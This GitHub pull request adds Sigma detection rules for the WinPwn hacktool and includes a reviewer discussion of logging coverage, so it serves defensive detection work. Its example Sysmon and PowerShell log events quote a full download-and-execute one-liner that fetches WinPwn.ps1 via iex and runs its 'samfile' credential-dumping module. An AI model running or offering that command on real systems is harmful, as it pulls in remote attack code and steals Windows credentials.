Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added a rule that detect suspicious execution of hacktool WinPwn #4529

Merged
merged 5 commits into from
Dec 4, 2023
Merged

Added a rule that detect suspicious execution of hacktool WinPwn #4529

merged 5 commits into from
Dec 4, 2023

Conversation

swachchhanda000
Copy link
Contributor

@swachchhanda000 swachchhanda000 commented Oct 30, 2023
edited by nasbench
Loading

Summary of the Pull Request

Added a rule that detect suspicious execution of hacktool WinPwn

Changelog

new: HackTool - WinPwn Execution - ScriptBlock
new: HackTool - WinPwn Execution

Example Log Event

1 5 4 1 0 0x8000000000000000 21417 Microsoft-Windows-Sysmon/Operational EC2AMAZ-KJR8SEA.winlocal.com - 2023-10-30 13:29:46.838 {3e855e75-afca-653f-1101-000000001e02} 4068 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation PowerShell.EXE "powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive} C:\Users\ADMINI~1\AppData\Local\Temp\ winlocal\Administrator {3e855e75-aea5-653f-707b-070000000000} 0x77b70 2 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F {3e855e75-aedb-653f-b700-000000001e02} 2632 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" winlocal\Administrator
1 5 4 1 0 0x8000000000000000 22508 Microsoft-Windows-Sysmon/Operational EC2AMAZ-KJR8SEA.adaws.com - 2023-10-30 14:19:09.005 {3e855e75-bb5d-653f-0803-000000001e02} 3304 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation PowerShell.EXE "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c .\Offline_WinPwn.ps1 samfile -consoleoutput -noninteractive C:\Users\Administrator\Desktop\WinPwn\ ADAWS\Administrator {3e855e75-aea5-653f-707b-070000000000} 0x77b70 2 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F {3e855e75-aedb-653f-b700-000000001e02} 2632 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ADAWS\Administrator

"{"win":{"system":{"providerName":"Microsoft-Windows-PowerShell","providerGuid":"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}","eventID":"4104","version":"1","level":"5","task":"2","opcode":"15","keywords":"0x0","systemTime":"2023-10-30T13:29:48.499908100Z","eventRecordID":"95973","processID":"4068","threadID":"6312","channel":"Microsoft-Windows-PowerShell/Operational","computer":"EC2AMAZ-KJR8SEA.adaws.com","severityValue":"VERBOSE","message":"\"Creating Scriptblock text (1 of 1):\r\n{$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\\nsamfile -consoleoutput -noninteractive}\r\n\r\nScriptBlock ID: 89a17aa1-c03c-4db4-93d3-1afddcf83bcc\r\nPath: \""},"eventdata":{"messageNumber":"1","messageTotal":"1","scriptBlockText":"{$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive}","scriptBlockId":"89a17aa1-c03c-4db4-93d3-1afddcf83bcc"}}}"

"{"win":{"system":{"providerName":"Microsoft-Windows-PowerShell","providerGuid":"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}","eventID":"4104","version":"1","level":"5","task":"2","opcode":"15","keywords":"0x0","systemTime":"2023-10-30T13:29:48.476117100Z","eventRecordID":"95972","processID":"4068","threadID":"6312","channel":"Microsoft-Windows-PowerShell/Operational","computer":"EC2AMAZ-KJR8SEA.adaws.com","severityValue":"VERBOSE","message":"\"Creating Scriptblock text (1 of 1):\r\n& {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\\nsamfile -consoleoutput -noninteractive}\r\n\r\nScriptBlock ID: 0cb0e315-8f45-420c-b721-5eb114109591\r\nPath: \""},"eventdata":{"messageNumber":"1","messageTotal":"1","scriptBlockText":"& {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') samfile -consoleoutput -noninteractive}","scriptBlockId":"0cb0e315-8f45-420c-b721-5eb114109591"}}}"

Fixed Issues

N/A

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules labels Oct 30, 2023
@nasbench nasbench self-requested a review October 30, 2023 10:47
@nasbench nasbench self-assigned this Oct 30, 2023
@nasbench
Copy link
Member

Hey @swachchhanda000 thanks for the contribution.

You know that by default execution of powershell scripts isn't captured by process creation event? Except when you run it via a handler like powershell -command or cmd /c

Can you provide logs for your testing?

Because there are rule covering the file creation and the powershell script block of WinPwn. Maybe update those instead.

@nasbench nasbench added Work In Progress Some changes are needed Author Input Required changes the require information from original author of the rules labels Oct 30, 2023
@swachchhanda000
Copy link
Contributor Author

@nasbench Yes it is true that event id 1 won't detect obfuscated command for which powershell script block can come handy. I created this rule just in case to detect through process creation event if executed normally. Powershell script block logging have more coverage but many organizations are hesitant to enable script logging (event id 4104) because of security reasons. In this case module logging (event id 4103) and process creation (event id 1) can be helpful. But module logging logs only logs information about the commandlets clearly. So, I thought it can work as well. Maybe I should add this rule for powershell script block event as well.

@nasbench
Copy link
Member

Please attach log of your testing for the proc creation execution. I can modify the rule but I need to see your logs to understand what you meant. Because as I said this won't detected by proc creation except if executed through handler as explained above.

If you mean like that then its fine just need to see your testing log :) I already made changes and waiting to push.

@swachchhanda000
Copy link
Contributor Author

@nasbench Thank you for your feedback
It appears that process creation event logs are generated when the winpwn.ps1 script is executed, whether it's hosted on a specific URL and run via a handler like powershell -command, or locally through handlers or remotely using IEX. To capture both scenarios, I removed the backslash () in the following manner

@nasbench nasbench removed the Author Input Required changes the require information from original author of the rules label Oct 30, 2023
@nasbench nasbench removed the Work In Progress Some changes are needed label Dec 4, 2023
@nasbench nasbench added the 2nd Review Needed PR need a second approval label Dec 4, 2023
frack113
frack113 approved these changes Dec 4, 2023
View reviewed changes
Copy link
Member

@frack113 frack113 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM

@nasbench nasbench merged commit f07e2b3 into SigmaHQ:master Dec 4, 2023
12 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@nasbench nasbench nasbench approved these changes

@frack113 frack113 frack113 approved these changes

@phantinuss phantinuss Awaiting requested review from phantinuss

Assignees

@nasbench nasbench

Labels
2nd Review Needed PR need a second approval Rules Windows Pull request add/update windows related rules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@swachchhanda000 @nasbench @frack113